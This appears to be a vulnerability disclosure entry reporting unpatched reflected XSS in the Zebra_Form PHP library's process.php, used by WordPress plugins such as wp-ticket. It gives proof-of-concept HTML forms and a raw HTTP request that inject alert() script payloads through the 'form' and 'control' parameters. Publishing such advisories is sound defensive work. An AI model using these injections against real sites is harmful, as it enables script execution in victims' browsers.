The Zebra_Form PHP library v2.9.8 (latest) and below, used by some WordPress plugins, is affected by reflected Cross-Site Scripting issues in its process.php file. There is currently no patch available and the removal of this library is recommended.
Via $_GET['form']:<br/><br/> <form action="https://example.com/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=</script><img src onerror=alert(/XSS-form/)>&control=upload" method="post" enctype="multipart/form-data"> <input type="file" name="upload"/> <input type="submit" name="submit" value="Send"> </form> <br/> Via $_GET['control']:<br/><br/> <form action="https://example.com/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=f&control=</script><svg/onload=alert(/XSS-control/)>" method="post" enctype="multipart/form-data"> <input type="file" name="</script><svg/onload=alert(/XSS-control/)>"/> <input type="submit" name="submit" value="Send"> </form> POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload HTTP/1.1 Host: example.com User-Agent: YOLO Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------77916619616724262872902741074 Content-Length: 241 Origin: null Connection: close Upgrade-Insecure-Requests: 1 -----------------------------77916619616724262872902741074 Content-Disposition: form-data; name="upload"; filename="a.txt" Content-Type: text/plain Test -----------------------------77916619616724262872902741074--
Yes
2021-02-14 (about 1 years ago)
2021-02-14 (about 1 years ago)
2021-02-16 (about 1 years ago)